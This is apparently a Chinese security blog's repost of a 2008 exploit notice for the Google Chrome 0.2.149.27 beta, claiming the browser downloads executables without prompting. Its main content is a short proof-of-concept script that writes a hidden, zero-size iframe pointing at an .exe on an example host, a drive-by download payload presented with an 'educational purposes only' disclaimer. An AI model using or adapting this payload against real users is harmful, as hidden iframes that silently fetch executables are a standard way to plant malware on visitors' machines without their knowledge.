首页 > 矩阵毒刺 > Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

2008年9月8日 发表评论 75 views 阅读评论

Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.Use the code it at your own risk.The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
 

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

随机日志

分类: 矩阵毒刺 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.